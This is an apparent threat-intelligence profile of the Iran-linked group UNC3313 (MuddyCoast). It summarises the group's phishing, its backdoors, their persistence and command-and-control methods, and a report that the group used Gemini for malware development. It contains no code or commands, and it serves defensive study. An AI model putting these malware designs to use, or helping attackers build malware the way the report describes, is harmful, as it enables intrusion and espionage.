MuddyCoast

UNC3313, also referred to as MuddyCoast, is an Iran-nexus threat group. The provided content describes it as conducting surveillance and strategic information-gathering operations via spear-phishing campaigns, and as an Iranian group active against Israel and the Middle East. One cited report states UNC3313 is affiliated with MuddyWater. Reported activity includes distribution of the JELLYBEAN dropper and CANDYBOX backdoor using phishing lures and file-sharing services, and use of up to nine legitimate remote monitoring and management tools to evade detection and maintain access. Mandiant also attributed multiple backdoors to UNC3313, including STARWHALE, STARWHALE.GO, and GRAMDOOR. STARWHALE is a VBScript/WSF backdoor that establishes persistence by creating a Windows service, performs host enumeration, communicates with a hardcoded C2 over HTTP POST using custom encoding, and executes commands via cmd.exe. STARWHALE.GO is a Golang variant delivered via certutil and an NSIS installer, persists via a Run key, exchanges JSON over HTTP POST with a hardcoded C2, and executes received commands via cmd.exe or directly based on file extension. GRAMDOOR is a Python 3.9 / PyInstaller backdoor delivered via an NSIS installer, persists via a Windows Run key, only executes on Windows 8 and higher, and uses the Telegram Bot API for command-and-control. Additional observed tradecraft includes storing PowerShell downloader commands in Registry keys referenced by a scheduled task, and downloading and installing the legitimate eHorus remote access tool as a Windows service for remote access. Google also reported that Iranian hackers MuddyCoast (UNC3313) used Gemini for malware development and debugging, accidentally exposing C2 domains and keys. Known aliases in the provided content are MuddyCoast and UNC3313.